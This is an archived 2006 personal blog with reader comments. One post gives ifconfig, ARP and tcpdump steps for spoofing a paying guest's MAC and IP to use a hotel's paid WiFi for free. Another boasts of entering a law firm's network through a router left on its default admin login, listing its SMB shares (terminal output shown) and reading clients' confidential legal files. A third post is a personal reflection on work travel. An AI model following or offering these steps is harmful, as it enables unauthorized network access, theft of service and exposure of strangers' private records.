Tuesday, February 28, 2006

Never Pay For WiFi Again
Sure, I have been stuck in a hotel for a few days with absolutely nothing to do. Left alone with my thoughts, one HBO that only plays shit, and a hotel that charges for WiFi access ... I have resorted to network violence. Even as I record this post I am starving some poor victim of bandwidth and leaving a trail of utter confusion. Allow me to explain, and before long YOU TOO can steal all of your paid WiFi access.

What you need:
* A WiFi card and an OS that allows you to change the MAC address
* A hotel that charges upwards of $200 a night, and still wants 10 bucks more for WiFi.

The idea here, is to assume the identity of a paying customer. This is tougher than it sounds. The access point will welcome you to the network by giving you an address through DHCP. Now you can talk to the access point, and nobody else. In fact, it seems if you try to ping one of the other users of the network, the access point will restrict you from gaining the MAC address of that other party. It seems they are able to stop you from getting the MAC address of anyone but the access point itself. This of course, will stop you from sending traffic to anyone else on the network. So how can you get the victim to send their MAC address to you? Become the access point.

ifconfig eth1 192.168.1.1


Now you can wait, or if you know the IP address of a legitimate paid customer, you can try pinging them now. You may get a response and you may not. It doesn't matter really. Now you can check your ARP table like this ...

arp -a


You should see the MAC address of the access point, maybe your own MAC address, and then the address or addresses of our potential victims. You might want to start up a second terminal and run ...

tcpdump -i eth1


Just watch for a few minutes and see what kind of traffic people are generating. If you start seeing requests for web pages, VPN connections, etc, those are paying customers. So get a look at their IP addresses. Just don't stay in this mode for long ... because you are derailing traffic from those folks, and confusing the utter hell out of them. Additionally, this is not very nice and you are cheating someone from the access that they paid for. Now ... let's get onto how to take advantage of them.

Now that you know the victims MAC address, and IP address, you need to assume it. This is the hard part, because a lot of OS's or WiFi cards, or BOTH will stop you from falsifying your MAC address. I suppose this is for security sake, but it pisses me off. I am trying to do all this on my MAC, and OS X hasn't allowed you to change the MAC address of the WiFi card since Jaguar. So in my case, I went out and got a "Live" distribution of Ubuntu Linux. The Live version can be booted directly from a CD ROM, and it comes in a Mac PowerPC flavor!

Having booted my distro, and having come to a terminal we do the following ...

ifconfig eth1 down
ifconfig eth1 hw ether 00:11:22:33:44:55
ifconfig eth1 192.168.1.10
ifconfig eth1 up


First, we brought down the network interface. This is a must. We can't just change our MAC address while the card is in use. For that matter, we're not "changing it" at all. Your MAC address is more or less hard-coded into the network device itself. But we can convince the OS to lie about it, and unless you get an error message ... we're in business. So the second line forced a new 'hw' (hardware) of an 'ether' (ethernet) type to '00:11:22:33:44:55'. This is an imaginary MAC address, so imagine it is that of our victim.

The third line was to configure the IP address of our victim. The last line 'raises' or starts the interface back up. At this point you ARE the victim. You have become ... THEM. You can bring up a browser and begin surfing.

What are the repercussions? There are a few. For one, the victim is probably still trying to use the WiFi access that they paid for. You are using it too .. as them. So imagine what the Access Point must be thinking. To the access point, one person is requesting all of the traffic that is actually coming from two different people. It happily answers each request. One the traffic comes back the other way, the access point sends the traffic to that 'one person' which is actually the TWO of you. So that is to say, if I bring up Yahoo.com, the web page comes back to both of you. Your victim's workstation is probably confused by this, as he didn't request that site. If your victim is especially savvy, YOU may become HIS victim, as he can see all of this traffic that only you should be seeing.

Otherwise, everything works just fine. Surprisingly.

Chicago Week #2
Why did I EVER agree to teaching two solid weeks in Chicago? Oh yeah, it was the money. That's it. At the end of last week I came home for the weekend. And never has a weekend passed by so quickly. Before I knew it, I was back at the airport and ready to go back to Chicago. Sitting on the plane, and watching my home town disappear from under me I flipped on my iPod and hit 'random shuffle'. Wouldn't you know it? Simon and Garfunkel. Homeward Bound. I have never paid that much attention to the song. It's not a song about 'going home'. It's a song about being far away from home, doing business with strangers, and questioning your sanity on the road. I just sort of welled up.

I suppose this is the life for a bachelor. Someone without any goals of family. Or someone who is just plain crazy. In fact, on my way back from Chicago last week I sat next to a guy on the plane. He was your typical "road warrior". Wearing his short sleeved Polo shirt, khaki pants, and gripping his pocket PC, he was on his way to my home town. We struck up a conversation about Columbus and what a nice town it is. "I'll only be here for an hour or so, and then I have to fly right back out". He went on to tell me how crazy his schedule is, and how he hasn't been home in nearly a month. We exchanged complaints about hotel living, airport security, lack of entertainment, etc. Near the end of our conversation he said, "it's weird you know ... living the bachelor lifestyle after all these years". I gathered from the conversation that he had a family, but he didn't know them very well any more. Divorced I imagine. Or perhaps he is one of these "barely married" types that has a wife whom he never sleeps with ... and really doesn't want to sleep with when he at home.

At any rate, the whole thing put me in a down swing, and could just see myself becoming that guy. This lonely old dude who roams the world and has obviously forgotten about what's important in life. For that matter, how does technology (and what I do with it) really make anyone happy?

My entire career is a lie. I am an "instructor". I teach people how to use products because at some point their manager or CEO was sold on said product. It is now my job to convince them that they should use it, and perhaps give them some pointers. They will then use said product to move information from point A to point B. A nice analogy to information technology might be Douglas Adam's explanation of 'the bypass' (highway) in Hitchhikers Guide to the Galaxy. He said that the bypass takes people from point A to point C. And people from point C to point A. All driving very fast of course. This leaves people in point B to wonder just what's so great about these two points that they have to drive so far and so fast to get there. I ... am at point B in my life. Information technology does little (if anything) to aid in human compassion. Being that human compassion is the only answer to true happiness, my entire career is a waste of time and money.

This leaves me in an awkward position. I can't walk into class and tell everyone why they are wasting their lives along with me. I have to keep selling this lie. As much as I try not to be ... I am part of the machine.

I need out of the training business, and I need a position where I can go home at night and do what's important, and that is to be close to my family. I need them, and they need me. I am doing nothing for my family when I am 500 miles away other then creating suffering.

Tonight I'll sing my songs again,
I'll play the game and pretend.
But all my words come back to me in shades of mediocrity
Like emptiness in harmony I need someone to comfort me.
Homeward bound,
I wish I was,
Homeward bound,
Home where my thoughts escaping,
Home where my musics playing,
Home where my love lies waiting
Silently for me

-Homeward Bound : Simon and Garfunkel


Historic Comments
Just make enough money to pay off all your debts, buy a cabin in the woods somewhere, quit your job, and drop off the radar. Sometimes the best way to deal with technology is to turn it off for a while.
Poe | 03.02.06 - 2:18 am | #

God bless you Poe. You understand!!

-Ray
Ray Dios Haque | 03.02.06 - 11:24 am | #

I've learned a lot of networking information and about dealing with life from reading your blog. Your a valuble instructor to unknown number of people over the internet.

Thank You!
Devo | 03.03.06 - 6:49 pm | #

Hey S! I can so relate on the technology front. I feel like I've forgotten much more than I remember anymore. I am so bored with being a code monkey but its the only thing anyone wants to pay me for right now.

I really want to be a Sommelier (wine expert) but I am looking at years of study and tests to get there. These tests cost money and just how am I supposed to get this money? Being a code monkey. Its a means to an end.

So, whatever happened to your attempts to break into the the security racket? I would think you'd be a natural. You'd also be able to spend more time with your familiy which seems to be the biggest issue with your current situation.

later,

Rich
Evil_Rich | 03.14.06 - 10:24 am | #

Devo - I'm glad my blogs have educated and inspired you.

Rich - Still a code monkey, eh? I just used a term the other day that you and the other code monkeys loved, "dancing balogna". That takes me back. Anyway, I would love to be a security auditor. Get paid to break into peoples networks. Unfortunately that job only seems to be available to folks with degrees, and so called "established experts". It's all a means to an end I suppose. We're just slaves together, to the information machine.

-Ray
Ray Dios Haque | 03.16.06 - 7:59 pm | #

Thursday, February 09, 2006

Steel-ing Documents
This week I travelled to Pittsburgh to teach a three day course in a downtown office building. When I passed through PA last week, I was blown away by just how many Steeler fans there are (long outside of Pittsburgh). After winning the SuperBowl, the fans of course went nuts. I was unaware of the celebration that was going to take place so I was a little surprised when I went to get a room at my usual hotel and they were booked. Woops! I was able to find a slightly cheaper hotel not too far away, that also provided free Internet access and a shuttle downtown.

By the way, I have had a good couple of weeks. Last week I took the family to New York. It was a vacation. That is, I was not teaching there. We just went for fun. We saw the statue of Liberty, Ellis Island, and Niagara Falls. And now I was in my favorite city, Pittsburgh. So you won't hear any bitching and whining from me in this posting (awww shucks!).

It seems that the Steelers were having one hell of a homecoming on Tuesday afternoon. There was going to be a parade and everything. So at lunchtime, I let everyone break for an hour and half to go watch it. I myself, also went down to the streets. It was simply amazing. There were 250,000 in the streets. All of downtown, and every other Steelers fan that had rolled into town lined the streets. The players came through, cheering, waving to the fans, signing autographs, and even doing some stage diving. Yes, stage diving. It was one hell of a homecoming party, and I was lucky enough to be around at the time.

The follwing day I found myself in this 30 story office building, about 15 floors up. It was lunchtime and I had decided not to go out. I could hold off until dinner, and I had spent way too much of my travel money on t-shirts to take home to my wife (Steeler Superbowl champ shirts). While I was waiting for my students to pop back, I dropped Audrey onto the window sill and went shopping for access points. And wow ... I found a lot of them. Here is what KisMac detected in "passive mode".



I hopped onto the first one that I found without WEP enabled. It was a "linksys" access point. The signal was strong, and I had an internet connection with it. But ... that just didn't satisyfy my urge to explore. I looked around the nextwork for hosts, and found none. I was likely stuck in a private network, that was in turn plugged into a seperate private network. Notice that there are actually two networks named "linksys"? I did. And I wanted to connect to the 'other one'. Like Windows, a Mac will only display the network name, not the actual access points. And when you have two named the same thing, you never know which one you are physically connected to. Luckily, later versions of KisMac like the one I am using, allows you to right click on an access point and join it. And so I did!

Once connected I ran "findsmb" in a terminal and it came up with nothing. I was sure there were windows hosts ... or something on this network. I pinged around and got some semi-conclusive results. Right about now, nmap would be a useful tool but I just reloaded the OS on this laptop a week ago and I was without all my old tools. Where else could I get a map of this network? Of course! I need to see the DHCP lease table. I'll bet that I can connect to the access point and provide the default admin username and password to get it. So I brought up 192.168.1.1 in my browser. I used the username and password of "admin" and I was in.



Next stop was to find the dhcp clients list on this thing. These menus were awful. I much prefer D-Link for navigation. But after much digging, I found a button for the client list. This is what I got.



I know, I know. I hate to blur things out. But what I had stumbled into was obvisouly a law firm. And I don't want to go to prison. So excuse the "mosaic blurs". As you can see, there were plenty of hosts on this network (or there had been lately). A lot of these looked to be laptops. Finding them would be a matter of trial and error. Again, nmap would be helpful. I REALLY need to put some developer tools on this laptop so I can compile my goodies. In the mean time, a simple file browse request will do the trick.

OS X ships with the smbclient utility. I will use it against this list of IP addresses. The usage is pretty simple, smbclient -L //ipaddress, where the "L" says to "show me a list of your shares". When it hanged, I did a CTRL+C to cancel, and then moved to the next one. Here is my terminal dialogue ...

Last login: Wed Feb  8 11:57:59 on ttyp1
Welcome to Darwin!
Ray-Dios-Haques-Computer:~ rayhaque$ smbclient -L //192.168.1.101
session request to 192.168.1.101 failed (Called name not present)
รง^C
Ray-Dios-Haques-Computer:~ rayhaque$ smbclient -L //192.168.1.102
timeout connecting to 192.168.1.102:445
Error connecting to 192.168.1.102 (Host is down)
Connection to 192.168.1.102 failed
Ray-Dios-Haques-Computer:~ rayhaque$ smbclient -L //192.168.1.105
Password:
Domain=[PARALEGAL] OS=[Windows 5.1] Server=[Windows 2000 LAN Manager]

Sharename Type Comment
--------- ---- -------
My Documents Disk
IPC$ IPC Remote IPC
print$ Disk Printer Drivers
SharedDocs Disk
Printer7 Printer SHARP AL-1641CS (Copy 1)
Printer4 Printer Sharpdesk Composer
Printer5 Printer SHARP AL-1641CS (Copy 3)
Printer3 Printer SHARP AL-1641CS
sharp Printer SHARP AL-1641CS (Copy 2)
Printer9 Printer PrimoPDF
Printer2 Printer HP Deskjet 3840 Series
MARCIAL Disk
Printer Printer HP Image Writer
session request to 192.168.1.105 failed (Called name not present)
session request to 192 failed (Called name not present)
Domain=[PARALEGAL] OS=[Windows 5.1] Server=[Windows 2000 LAN Manager]

Server Comment
--------- -------

Workgroup Master
--------- -------
Ray-Dios-Haques-Computer:~ rayhaque$ smbclient
Usage: [-?EgVNkP] [--usage] [-R NAME-RESOLVE-ORDER] [-M HOST] [-I IP] [-L HOST]
[-t CODE] [-m LEVEL] [-T IXFqgbNan] [-D DIR] [-c ARG] [-b BYTES]
[-p PORT] [-d DEBUGLEVEL] [-s CONFIGFILE] [-l LOGFILEBASE]
[-O SOCKETOPTIONS] [-n NETBIOSNAME] [-W WORKGROUP] [-i SCOPE]
[-U USERNAME] [-A FILE] [-S on|off|required] service
Ray-Dios-Haques-Computer:~ rayhaque$ smbmount
-bash: smbmount: command not found
Ray-Dios-Haques-Computer:~ rayhaque$ mountsmb
-bash: mountsmb: command not found
Ray-Dios-Haques-Computer:~ rayhaque$ mount -t smb
Ray-Dios-Haques-Computer:~ rayhaque$ mount -t smb //192.168.1.105/MARCIAL
usage: mount [-dfruvw] [-o options] [-t ufs | external_type] special node
mount [-adfruvw] [-t ufs | external_type]
mount [-dfruvw] special | node
Ray-Dios-Haques-Computer:~ rayhaque$ mount -t smbfs //192.168.1.105/MARCIAL
usage: mount [-dfruvw] [-o options] [-t ufs | external_type] special node
mount [-adfruvw] [-t ufs | external_type]
mount [-dfruvw] special | node
Ray-Dios-Haques-Computer:~ rayhaque$


It looks like I found a winner. He has a couple of interesting looking shares. It's too bad I can't remember how to mount a share from terminal. Instead, I end up using "Finder" to "Connect to server ...". Here is that box.



There is a delay, and I am now asked to authenticate. This could be a problem, as I am not a user on their domain/directory ... if they have one. I will try "guest" with no password. This probably won't work.



Oh, and it does work. How sad! I wonder what we will find here. Let's have a look at this share, shall we?



These look like ... "lawyer stuff" ... or something. Let's have a closer look.



Looks like an interesting story. Some womans husband is getting deported, and she is asking that they please not take him away. How is it this guy rakes in $94k a year raising horses. I'm in the wrong fucking business. Either I need to start raising horses, or become an immigrant and hook up with one.



I don't know what this fingerprint business is about. But I thought it looked amusing.

There were no doubt other goodies on this workstation, but I had a whole network to explore, and lunchtime was going by fast. I went ahead and moved onto my next target. Here is that terminal dialogue ...

Last login: Wed Feb  8 12:09:52 on ttyp2
Welcome to Darwin!
Ray-Dios-Haques-Computer:~ rayhaque$ smbclient -L //192.168.1.106
session request to 192.168.1.106 failed (Called name not present)
session request to 192 failed (Called name not present)
Password:
Domain=[ATTORNEY] OS=[Windows 5.1] Server=[Windows 2000 LAN Manager]

Sharename Type Comment
--------- ---- -------
Clients Disk
My Documents Disk
IPC$ IPC Remote IPC
print$ Disk Printer Drivers
SharedDocs Disk
C Disk
Impro56 Disk
Printer3 Printer PrimoPDF
Printer5 Printer KONICA MINOLTA PagePro 1350W (Copy 1)
Case Lists Disk
Printer2 Printer KONICA MINOLTA PagePro 1350W
ADMIN$ Disk Remote Admin
C$ Disk Default share
Printer Printer Microsoft Office Document Image Writer
session request to 192.168.1.106 failed (Called name not present)
session request to 192 failed (Called name not present)
Domain=[ATTORNEY] OS=[Windows 5.1] Server=[Windows 2000 LAN Manager]

Server Comment
--------- -------

Workgroup Master
--------- -------
Ray-Dios-Haques-Computer:~ rayhaque$


You'll that it asks me for a password at some point, and I just sort of struck the enter key as if to say "I don't need no steenkin' password". That seemed to do the trick, and I got a list of shared stuff. Would you LOOK at these?

Note to prospective network users/attorneys/fucktards: Do not share your entire client list, without security, calling it Clients, and leave it laying on a non-secured access point. Do not share "My Documents". They are YOUR fucking documents. Not mine. Keep them to yourself. Do not share your entire C drive. In fact, having shared your entire C drive in such a manner, you can disregard all of these other rules -because you are an idiot, and you blew it.

I attach to the "C" share just to see if the user was indeed that stupid. They were. I hit the "Clients" folder to see if it does indeed have a list of clients, or documents pertaining to their client base. It does.




This is the point at which I make an ethical decision. Should I delve into the lives of others and begin reading their personal files? Do I really want to explore the legal matters of strangers, and further incriminate myself?

...

Of course I fucking do it! Here are some samples of the better tidbits I found.




Just when I was getting to the really good stuff my students started returning to lunch. My laptop is a real eye sore, and Audrey just loves the attention she gets for her "Franken-stein-ish" appearance. After having a couple of awkward moments with students having over my shoulder asking "whatcha' doing?" I decided to end this adventure and get back to work.

Next time I am out in Pittsburgh I really need to go wardriving, or better yet war-walking.

Historic Comments
Christ Ray, see what happens when you try to do a bigboy job with a "mac"?

"Where else could I get a map of this network? Of course! I need to see the DHCP lease table"

Fuck "findsmb" dude. Hitting the lease table it first on my list. No waiting, no guessing, and if someone is dumb enough to name their router "Linksys" then there is a 92.3% chance the default password is the same.

On a side note, I would have to say as of late that I really like the Auditor (or BackTrack) live Cd from remote-exploit.org. It just have all the tools/drivers in one package.

Now, add that with a network card that supports packet injection and you've got wep cracking in less than a couple minutes. Longer for 3 types of wpa.

anyways....i digress....i need ben and jerry's.
Phrightener | 02.10.06 - 11:17 pm | #

you law breaker you
LiteHedded | Homepage | 02.14.06 - 10:33 am | #

Should have renamed their documents: Dear John Letter, People I'm Firing, People I'm Sleeping With, Embezzelment Funds, Potato Bar, etc...

Keep them guessing when they need that document next.
Poe | 02.16.06 - 7:35 pm | #

Phrighty: I love you. When are we going to finally get together and have gay sex? I'm going to have to check out that Auditor distro. I was just telling someone the other day about how cool Knoppix-STD was before it got so old and useless.

Poe: Hah! They would probably learn to live with the annoyance instead of figuring out how to fix it. "Where is the Smith case?" - "Oh, check the 'Go Fuck Yourself' folder, and open up 'i shit myself lol.doc'.

-Ray
Ray Dios Haque | 02.21.06 - 8:19 pm | #